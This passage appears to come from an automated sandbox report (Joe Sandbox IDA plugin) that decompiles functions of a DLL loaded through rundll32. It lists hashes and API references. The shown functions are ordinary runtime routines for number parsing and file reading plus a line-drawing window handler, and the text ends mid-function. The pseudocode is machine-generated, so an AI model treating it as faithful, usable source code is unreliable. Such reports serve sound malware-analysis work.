Instruction Fuzzy Hash: 0A21947AD04108AFDB41DFA4D981DDE7BB9EF08244F4086A6F515DB222DB71EA448FC0

Uniqueness

Uniqueness Score: -1.00%

Function 1000EFDF, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1000EFDF(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed short* _v156;
				signed short* _v160;
				signed int _v164;
				intOrPtr _v168;
				signed short* _v172;
				char _v176;
				char _v188;
				signed short* _t176;
				signed int _t177;
				signed int _t178;
				signed short* _t179;
				signed int _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				void* _t187;
				signed char _t189;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				void* _t199;
				intOrPtr _t200;
				signed int _t208;
				signed int _t209;
				signed short* _t211;
				signed int _t212;
				signed int _t214;
				intOrPtr _t219;
				void* _t220;
				signed short* _t221;
				signed int _t222;
				signed short* _t223;
				intOrPtr _t224;
				void* _t228;
				signed short* _t230;
				signed int _t232;
				signed short* _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed short* _t240;
				intOrPtr* _t244;
				signed short _t245;

				if(E1000FB5A( &_a8) == 0) {
					L5:
					_t235 = 0;
					_t208 = 0;
					L6:
					_t244 = _a12;
					if(_t244 != 0) {
						 *_t244 = _a8;
					}
					return _t235;
				}
				_t209 = _a16;
				_t236 = 2;
				if(_t209 == 0) {
					L9:
					_t217 =  &_v188;
					E1000F794( &_v188, _t228, _a4);
					_v12 = 0;
					_v20 = 0;
					_t176 = _a8;
					_v172 = _t176;
					_t245 =  *_t176 & 0x0000ffff;
					_t177 =  &(_t176[1]);
					L11:
					_a8 = _t177;
					_t178 = E100242A0(_t217, _t245, 8);
					_pop(_t217);
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = _a8;
						_t245 =  *_t179 & 0x0000ffff;
						_t177 = _t179 + _t236;
						__eflags = _t177;
						goto L11;
					}
					_t180 = _a20 & 0x000000ff;
					_v8 = _t180;
					__eflags = _t245 - 0x2d;
					if(_t245 != 0x2d) {
						__eflags = _t245 - 0x2b;
						if(_t245 != 0x2b) {
							_t230 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v8 = _t180 | _t236;
						L15:
						_t234 = _a8;
						_t245 =  *_t234 & 0x0000ffff;
						_t230 = _t234 + _t236;
						_a8 = _t230;
						L17:
						_v16 = 0x3a;
						_t219 = 0xff10;
						_v148 = 0x66a;
						_v24 = 0x6f0;
						_v28 = 0x6fa;
						_v32 = 0x966;
						_v36 = 0x970;
						_v40 = 0x9e6;
						_v44 = 0x9f0;
						_v48 = 0xa66;
						_v52 = 0xa70;
						_v56 = 0xae6;
						_v60 = 0xaf0;
						_v64 = 0xb66;
						_v68 = 0xb70;
						_v72 = 0xc66;
						_v76 = 0xc70;
						_v80 = 0xce6;
						_v84 = 0xcf0;
						_v88 = 0xd66;
						_v92 = 0xd70;
						_v96 = 0xe50;
						_v100 = 0xe5a;
						_v104 = 0xed0;
						_v108 = 0xeda;
						_v112 = 0xf20;
						_v116 = 0xf2a;
						_v120 = 0x1040;
						_v124 = 0x104a;
						_v128 = 0x17e0;
						_v132 = 0x17ea;
						_v136 = 0x1810;
						_v140 = 0x181a;
						_v144 = 0xff1a;
						_t237 = 0x30;
						__eflags = _t209;
						if(_t209 == 0) {
							L19:
							__eflags = _t245 - _t237;
							if(_t245 < _t237) {
								L61:
								_t182 = _t245 & 0x0000ffff;
								__eflags = _t182 - 0x41;
								if(_t182 < 0x41) {
									L64:
									_t86 = _t182 - 0x61; // 0x5ff
									_t220 = _t86;
									__eflags = _t220 - 0x19;
									if(_t220 > 0x19) {
										_t183 = _t182 | 0xffffffff;
										__eflags = _t183;
										L69:
										__eflags = _t183;
										if(_t183 == 0) {
											_t184 =  *_t230 & 0x0000ffff;
											_t221 =  &(_t230[1]);
											_a8 = _t221;
											__eflags = _t184 - 0x78;
											if(_t184 == 0x78) {
												L77:
												__eflags = _t209;
												if(_t209 == 0) {
													_t209 = 0x10;
													_a16 = _t209;
												}
												_t245 =  *_t221 & 0x0000ffff;
												_t222 =  &(_t221[1]);
												__eflags = _t222;
												_a8 = _t222;
												L80:
												_t185 = _t209;
												asm("cdq");
												_push(_t209);
												_t223 = _t230;
												_v164 = _t209;
												_v160 = _t223;
												_t186 = E1003F7B0(0xffffffff, 0xffffffff, _t185, _t223);
												_v152 = _t209;
												_v156 = _t223;
												_t211 = _t230;
												_t224 = _t186;
												_v16 = _t211;
												_v168 = _t224;
												while(1) {
													__eflags = _t245 - _t237;
													if(_t245 < _t237) {
														goto L122;
													}
													_t199 = 0x3a;
													__eflags = _t245 - _t199;
													if(_t245 >= _t199) {
														_t200 = 0xff10;
														__eflags = _t245 - 0xff10;
														if(_t245 >= 0xff10) {
															__eflags = _t245 - _v144;
															if(_t245 < _v144) {
																L87:
																_t239 = (_t245 & 0x0000ffff) - _t200;
																L121:
																__eflags = _t239 - 0xffffffff;
																if(_t239 != 0xffffffff) {
																	L130:
																	__eflags = _t239 - 0xffffffff;
																	if(_t239 == 0xffffffff) {
																		L144:
																		E1000FB11( &_a8, _t245);
																		_t189 = _v8;
																		__eflags = _t189 & 0x00000008;
																		if((_t189 & 0x00000008) != 0) {
																			_t208 = _v20;
																			_t235 = _v12;
																			__eflags = E1000E497(_t189, _t235, _t208);
																			if(__eflags == 0) {
																				__eflags = _v8 & 0x00000002;
																				if((_v8 & 0x00000002) != 0) {
																					_t235 =  ~_t235;
																					asm("adc ebx, 0x0");
																					_t208 =  ~_t208;
																				}
																				L155:
																				__eflags = _v176;
																				if(_v176 != 0) {
																					 *(_v188 + 0x350) =  *(_v188 + 0x350) & 0xfffffffd;
																				}
																				goto L6;
																			}
																			 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
																			_t193 = _v8;
																			__eflags = _t193 & 0x00000001;
																			if((_t193 & 0x00000001) != 0) {
																				__eflags = _t193 & 0x00000002;
																				if((_t193 & 0x00000002) == 0) {
																					_t194 = _t193 | 0xffffffff;
																					__eflags = _t194;
																					_t208 = 0x7fffffff;
																				} else {
																					_t194 = 0;
																					_t208 = 0x80000000;
																				}
																				L152:
																				_t235 = _t194;
																				goto L155;
																			}
																			_t235 = _t235 | 0xffffffff;
																			_t208 = _t208 | 0xffffffff;
																			goto L155;
																		}
																		_a8 = _v172;
																		_t194 = 0;
																		_t208 = 0;
																		goto L152;
																	}
																	__eflags = _t239 - _a16;
																	if(_t239 >= _a16) {
																		goto L144;
																	}
																	_t196 = _v20;
																	_t232 = _v8 | 0x00000008;
																	__eflags = _t196 - _t211;
																	_v8 = _t232;
																	_t212 = _v12;
																	if(__eflags < 0) {
																		L141:
																		__eflags = 0;
																		L142:
																		_t214 = E1003F850(_v164, _v160, _t212, _t196) + _t239;
																		__eflags = _t214;
																		_v12 = _t214;
																		asm("adc eax, esi");
																		_v20 = _t232;
																		L143:
																		_t240 = _a8;
																		_t224 = _v168;
																		_t211 = _v16;
																		_t245 =  *_t240 & 0x0000ffff;
																		_a8 =  &(_t240[1]);
																		_t237 = 0x30;
																		continue;
																	}
																	if(__eflags > 0) {
																		L135:
																		__eflags = _t212 - _t224;
																		if(_t212 != _t224) {
																			L140:
																			_v8 = _t232 | 0x00000004;
																			goto L143;
																		}
																		__eflags = _t196 - _v16;
																		if(_t196 != _v16) {
																			goto L140;
																		}
																		__eflags = 0 - _v152;
																		if(__eflags < 0) {
																			goto L142;
																		}
																		if(__eflags > 0) {
																			goto L140;
																		}
																		__eflags = _t239 - _v156;
																		if(_t239 <= _v156) {
																			goto L142;
																		}
																		goto L140;
																	}
																	__eflags = _t212 - _t224;
																	if(_t212 < _t224) {
																		goto L141;
																	}
																	goto L135;
																}
																goto L122;
															}
															_t239 = _t237 | 0xffffffff;
															__eflags = _t239;
															goto L121;
														}
														_t200 = 0x660;
														__eflags = _t245 - 0x660;
														if(_t245 < 0x660) {
															goto L122;
														}
														__eflags = _t245 - _v148;
														if(_t245 >= _v148) {
															_t200 = _v24;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v28;
															if(_t245 < _v28) {
																goto L87;
															}
															_t200 = _v32;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v36;
															if(_t245 < _v36) {
																goto L87;
															}
															_t200 = _v40;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v44;
															if(_t245 < _v44) {
																goto L87;
															}
															_t200 = _v48;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v52;
															if(_t245 < _v52) {
																goto L87;
															}
															_t200 = _v56;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v60;
															if(_t245 < _v60) {
																goto L87;
															}
															_t200 = _v64;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v68;
															if(_t245 < _v68) {
																goto L87;
															}
															_t200 = _v72;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v76;
															if(_t245 < _v76) {
																goto L87;
															}
															_t200 = _v80;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v84;
															if(_t245 < _v84) {
																goto L87;
															}
															_t200 = _v88;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v92;
															if(_t245 < _v92) {
																goto L87;
															}
															_t200 = _v96;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v100;
															if(_t245 < _v100) {
																goto L87;
															}
															_t200 = _v104;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v108;
															if(_t245 < _v108) {
																goto L87;
															}
															_t200 = _v112;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v116;
															if(_t245 < _v116) {
																goto L87;
															}
															_t200 = _v120;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v124;
															if(_t245 < _v124) {
																goto L87;
															}
															_t200 = _v128;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v132;
															if(_t245 < _v132) {
																goto L87;
															}
															_t200 = _v136;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v140;
															if(_t245 >= _v140) {
																goto L122;
															}
														}
														goto L87;
													}
													_t239 = (_t245 & 0x0000ffff) - 0x30;
													goto L121;
													L122:
													_t238 = _t245 & 0x0000ffff;
													__eflags = _t238 - 0x41;
													if(_t238 < 0x41) {
														L125:
														_t133 = _t238 - 0x61; // -49
														_t187 = _t133;
														__eflags = _t187 - 0x19;
														if(_t187 > 0x19) {
															_t239 = _t238 | 0xffffffff;
															__eflags = _t239;
															goto L130;
														}
														L126:
														__eflags = _t187 - 0x19;
														if(_t187 <= 0x19) {
															_t238 = _t238 + 0xffffffe0;
															__eflags = _t238;
														}
														_t239 = _t238 + 0xffffffc9;
														goto L130;
													}
													__eflags = _t238 - 0x5a;
													if(_t238 > 0x5a) {
														goto L125;
													}
													_t132 = _t238 - 0x61; // -49
													_t187 = _t132;
													goto L126;
												}
											}
											__eflags = _t184 - 0x58;
											if(_t184 == 0x58) {
												goto L77;
											}
											__eflags = _t209;
											if(_t209 == 0) {
												_t209 = 8;
												_a16 = _t209;
											}
											E1000FB11( &_a8, _t184);
											goto L80;
										}
										__eflags = _t209;
										if(_t209 == 0) {
											_t209 = 0xa;
											_a16 = _t209;
										}
										goto L80;
									}
									L65:
									__eflags = _t220 - 0x19;
									if(_t220 <= 0x19) {
										_t182 = _t182 + 0xffffffe0;
										__eflags = _t182;
									}
									_t183 = _t182 + 0xffffffc9;
									goto L69;
								}
								__eflags = _t182 - 0x5a;
								if(_t182 > 0x5a) {
									goto L64;
								}
								_t85 = _t182 - 0x61; // 0x5ff
								_t220 = _t85;
								goto L65;
							}
							__eflags = _t245 - _v16;
							if(_t245 >= _v16) {
								__eflags = _t245 - _t219;
								if(_t245 >= _t219) {
									__eflags = _t245 - _v144;
									if(_t245 < _v144) {
										L28:
										_t183 = (_t245 & 0x0000ffff) - _t219;
										L60:
										__eflags = _t183 - 0xffffffff;
										if(_t183 != 0xffffffff) {
											goto L69;
										}
										goto L61;
									}
									_t183 = 0xffffffffffffffff;
									__eflags = 0xffffffffffffffff;
									goto L60;
								}
								__eflags = _t245 - 0x660;
								if(_t245 < 0x660) {
									goto L61;
								}
								__eflags = _t245 - _v148;
								if(_t245 >= _v148) {
									_t219 = _v24;
									__eflags = _t245 - _t219;
									if(_t245 < _t219) {
										goto L61;
									}
									__eflags = _t245 - _v28;
									if(_t245 >= _v28) {
										_t219 = _v32;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v36;
										if(_t245 < _v36) {
											goto L28;
										}
										_t219 = _v40;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v44;
										if(_t245 < _v44) {
											goto L28;
										}
										_t219 = _v48;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v52;
										if(_t245 < _v52) {
											goto L28;
										}
										_t219 = _v56;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v60;
										if(_t245 < _v60) {
											goto L28;
										}
										_t219 = _v64;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v68;
										if(_t245 < _v68) {
											goto L28;
										}
										_t219 = _v72;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v76;
										if(_t245 < _v76) {
											goto L28;
										}
										_t219 = _v80;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v84;
										if(_t245 < _v84) {
											goto L28;
										}
										_t219 = _v88;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v92;
										if(_t245 < _v92) {
											goto L28;
										}
										_t219 = _v96;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v100;
										if(_t245 < _v100) {
											goto L28;
										}
										_t219 = _v104;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v108;
										if(_t245 < _v108) {
											goto L28;
										}
										_t219 = _v112;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v116;
										if(_t245 < _v116) {
											goto L28;
										}
										_t219 = _v120;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v124;
										if(_t245 < _v124) {
											goto L28;
										}
										_t219 = _v128;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v132;
										if(_t245 < _v132) {
											goto L28;
										}
										_t219 = _v136;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v140;
										if(_t245 >= _v140) {
											goto L61;
										}
									}
									goto L28;
								}
								_t183 = (_t245 & 0x0000ffff) - 0x660;
								goto L60;
							}
							_t183 = (_t245 & 0x0000ffff) - _t237;
							goto L60;
						}
						__eflags = _t209 - 0x10;
						if(_t209 != 0x10) {
							goto L80;
						}
						goto L19;
					}
				}
				if(_t209 < _t236) {
					L4:
					 *((intOrPtr*)(E1002449E(_t253))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t253 = _t209 - 0x24;
				if(_t209 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

APIs

__aulldvrm.LIBCMT ref: 1000F3BC

Strings

p, xrefs: 1000F0D1
f, xrefs: 1000F0CA
p, xrefs: 1000F133
f, xrefs: 1000F12C
p, xrefs: 1000F0ED
f, xrefs: 1000F0E6
:, xrefs: 1000F0A1

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction ID: e40459f71609af27f955baf17b6dca83de0bb25eb23cd22cff97dc1eb6c4fdf7
Opcode Fuzzy Hash: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction Fuzzy Hash: EF028475E00259CAFF60CFA4D8486FDB7B2FB40B94FA1811DD424BB689D7705E84AB11

Uniqueness

Uniqueness Score: -1.00%

Function 100015F8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100015F8(void* __ecx, struct HWND__* _a4, int _a12, int _a16) {
				int _v8;
				int _v12;
				intOrPtr _t20;
				intOrPtr _t33;
				void* _t35;
				struct HDC__* _t40;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t33 =  *0x1004dc38; // 0x313ce8
					_t4 = _t33 + 4; // 0x313ce8
					_t20 =  *_t4;
					_t5 = _t20 + 8; // 0x0
					_t6 = _t20 + 0xc; // 0x0
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t35, _t33);
					_t40 = GetDC(_a4);
					MoveToEx(_t40,  *_t5,  *_t6, 0);
					LineTo(_t40, _v12, _v8);
					ReleaseDC(_a4, _t40);
				}
				return 0;
			}

0x1000161f
0x1000162a
0x10001633
0x10001633
0x10001636
0x10001639
0x1000163f
0x10001645
0x1000164b
0x10001652
0x10001663
0x10001667
0x10001674
0x1000167e
0x10001686
0x1000168a

APIs

GetMenu.USER32 ref: 10001600
GetSubMenu.USER32 ref: 10001609
GetMenuState.USER32(00000000,000000CB,00000000), ref: 10001617

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 1000165A
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001667
LineTo.GDI32(00000000,?,?), ref: 10001674
ReleaseDC.USER32(?,00000000), ref: 1000167E

Strings

<1, xrefs: 1000162A, 1000164D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateLineMoveReleaseState
String ID: <1
API String ID: 2409786466-3323784537
Opcode ID: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction ID: b7c906b1751459d05ed15d7226b6fca836a6211401a0122071cd1be87b3306df
Opcode Fuzzy Hash: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction Fuzzy Hash: 86115E75600118BFEB019FA4CE89FDA7FB9EF0A395F158055FA01D6160C7B19D40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10039C35, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10039C35(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E1002448B(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E1002449E( *_t137))) = 9;
						L60:
						_t139 = E1000E314();
						goto L61;
					}
					__eflags = _t198 -  *0x1004e828; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x1004e628 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E1002448B(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
								E1000E314();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E10024214(_t154);
								E100268B3(0);
								E100268B3(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E1003948F(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E100331B8(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E10024468(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E1002449E(__eflags))) = 9;
											 *(E1002448B(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E1003973E();
												} else {
													_t170 = E10039AA6();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E1003994F(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
									 *(E1002448B(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E100268B3(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E1002448B(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E1002448B(_t246)) =  *_t197 & 0x00000000;
					_t139 = E1002449E(_t246);
					 *_t139 = 9;
					L61:
